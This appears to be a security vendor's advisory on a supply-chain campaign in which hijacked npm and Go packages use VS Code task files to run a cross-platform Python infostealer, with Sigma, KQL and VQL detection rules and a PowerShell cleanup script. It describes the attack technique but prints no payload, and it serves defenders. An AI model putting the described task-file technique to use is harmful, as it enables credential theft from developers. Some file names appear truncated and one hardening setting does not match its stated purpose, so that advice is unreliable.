In June 2026, JFrog security researchers uncovered a sophisticated supply chain attack targeting the open-source ecosystem. This campaign involves hijacked npm packages and a cluster of Go modules designed to deploy a Python-based information stealer across Windows, Linux, and macOS environments.
What sets this attack apart is the exploitation of Visual Studio Code (VS Code) task configurations. By embedding malicious commands within .vscode/tasks., the actors have effectively bypassed the security hardenings introduced in npm v12, which traditionally restricted the use of lifecycle scripts like preinstall and postinstall. For defenders, this represents a shift in execution tradecraft: the attack vector is no longer just the package manager binary, but the developer's IDE itself. If your organization consumes open-source libraries, immediate detection of these artifacts is required to prevent credential exfiltration and system compromise.
Technical Analysis
Affected Products & Platforms:
- Platforms: Windows, Linux, macOS
- Package Managers: npm (Node.js), Go (Golang)
- IDE: Visual Studio Code (any version executing workspace tasks)
Attack Chain & TTPs:
- Initial Compromise: Threat actors hijack legitimate or typo-squatted npm and Go package repositories.
- Payload Injection: Instead of relying on
package.lifecycle scripts (which are scrutinized by modern security tools and npm v12 restrictions), the attackers create a.vscode/tasks.file within the package directory. - Execution Trigger: When a developer or build server opens the compromised project directory in VS Code, the IDE may automatically prompt to run tasks or execute them if configured to do so. The task definition points to a Python script.
- Payload Deployment: The Python script acts as an infostealer. It is cross-platform, capable of running on Windows, Linux, and macOS to exfiltrate sensitive data (likely credentials, browser data, or cryptographic keys).
Exploitation Status:
- Confirmed Active Exploitation: Yes, observed in the wild by JFrog.
- CVE: Not applicable (abuse of feature/configuration).
This technique leverages the trust developers place in their workspace configuration files. It allows the attacker to execute code under the context of the user running the IDE, often a developer with elevated privileges or access to critical source code and CI/CD secrets.
Detection & Response
The following detection rules focus on the anomalous use of VS Code to spawn interpreter processes (Python) from within dependency directories (node_modules or go), as well as the creation of the specific artifact involved.
Sigma Rules
---
title: Potential VS Code Task Execution from node_modules
id: 8a2b4c1d-5e6f-4a3b-8c9d-1e2f3a4b5c6d
status: experimental
description: Detects VS Code (Code.exe) spawning python.exe from within a node_modules directory, a common indicator of the hijacked package supply chain attack.
references:
- https://thehackernews.com/2026/06/hijacked-npm-and-go-packages-use-vs.html
author: Security Arsenal
date: 2026/06/18
tags:
- attack.execution
- attack.t1204
- attack.supply_chain
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith:
- '\Code.exe'
- '\Code - Insiders.exe'
selection_child:
Image|endswith:
- '\python.exe'
- '\python3.exe'
- '\pythonw.exe'
selection_path:
CommandLine|contains:
- 'node_modules'
- '.vscode'
condition: all of selection_*
falsepositives:
- Legitimate developer debugging sessions (rarely runs directly from node_modules)
level: high
---
title: Creation of .vscode/tasks. in Dependency Directories
id: 9c3d5e2f-6a7b-4c5d-9e0f-2a3b4c5d6e7f
status: experimental
description: Detects the creation of tasks. within a .vscode folder located inside dependency directories (node_modules or go/pkg), indicating a potential supply chain compromise.
references:
- https://thehackernews.com/2026/06/hijacked-npm-and-go-packages-use-vs.html
author: Security Arsenal
date: 2026/06/18
tags:
- attack.persistence
- attack.t1547
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|contains:
- 'node_modules\\.vscode\\tasks.'
- 'go\\pkg\\mod\\.vscode\\tasks.'
condition: selection
falsepositives:
- Legitimate project configuration (unlikely in deep dependency paths)
level: high
KQL (Microsoft Sentinel / Defender)
This query hunts for the specific parent-child process relationship indicative of the VS Code task execution vector.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ('Code.exe', 'Code - Insiders.exe', 'code')
| where FileName in~ ('python.exe', 'python3.exe', 'python')
| where ProcessCommandLine has_any ('node_modules', '.vscode', 'go/pkg')
| project Timestamp, DeviceName, AccountName, InitiatingProcessCommandLine, ProcessCommandLine, FolderPath
| order by Timestamp desc
Velociraptor VQL
This VQL artifact hunts for the presence of .vscode/tasks. files inside common dependency directories on disk, which should not exist in standard library packages.
-- Hunt for VS Code tasks inside dependency folders
SELECT FullPath, Size, Mtime
FROM glob(globs='/**/node_modules/.vscode/tasks.')
WHERE NOT FullPath =~ '.*\.vscode-server.*' -- Exclude VS Code server install paths
UNION ALL
SELECT FullPath, Size, Mtime
FROM glob(globs='/**/go/pkg/mod/**/*.vscode/tasks.')
Remediation Script (PowerShell)
This script scans the current directory (recursively) for .vscode folders located within node_modules and removes them. It is intended to be run in the root of a project suspected of infection.
<#
.SYNOPSIS
Removes suspicious .vscode directories from node_modules.
.DESCRIPTION
Scans for .vscode folders inside node_modules (indicative of the supply chain attack)
and removes them to prevent VS Code from executing malicious tasks.
#>
Write-Host "[+] Scanning for suspicious .vscode folders in node_modules..."
$suspiciousPaths = Get-ChildItem -Path . -Recurse -Directory -Filter ".vscode" -ErrorAction SilentlyContinue |
Where-Object { $_.FullName -match "node_modules" -or $_.FullName -match "go\\pkg\\mod" }
if ($suspiciousPaths) {
foreach ($path in $suspiciousPaths) {
Write-Host "[!] Found suspicious artifact: $($path.FullName)" -ForegroundColor Yellow
try {
Remove-Item -Path $path.FullName -Recurse -Force
Write-Host "[+] Removed: $($path.FullName)" -ForegroundColor Green
} catch {
Write-Host "[-] Failed to remove: $($path.FullName) - $_" -ForegroundColor Red
}
}
} else {
Write-Host "[+] No suspicious .vscode folders found in dependencies." -ForegroundColor Green
}
Write-Host "[+] Scan complete."
Remediation
-
Audit and Sanitize Dependencies: Immediately audit
package-lock.andgo.sumfiles against the JFrog advisory (referenced via Source URL). Remove any identified malicious packages. -
Remove Artifacts:
Delete the `node_modules` folder and re-install dependencies using `npm ci` (clean install) or `go mod tidy` only after verifying the integrity of `package.`. Ensure the `.vscode` folders within dependency directories are removed.
-
IDE Hardening: Configure VS Code policies to prevent the automatic execution of tasks upon opening a folder. Set
"window.confirmBeforeClose": "always"and review trust settings for workspaces. -
Supply Chain Vetting: Implement Software Composition Analysis (SCA) tools that detect not just vulnerable CVEs, but suspicious file inclusions (like
.vscodeor scripts) inside package artifacts. -
Credential Rotation: Due to the presence of an infostealer, assume that developer credentials (API keys, tokens) present on the host during the infection may have been compromised. Rotate credentials immediately.
Related Resources
Security Arsenal Healthcare Cybersecurity AlertMonitor Platform Book a SOC Assessment healthcare Intel Hub
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.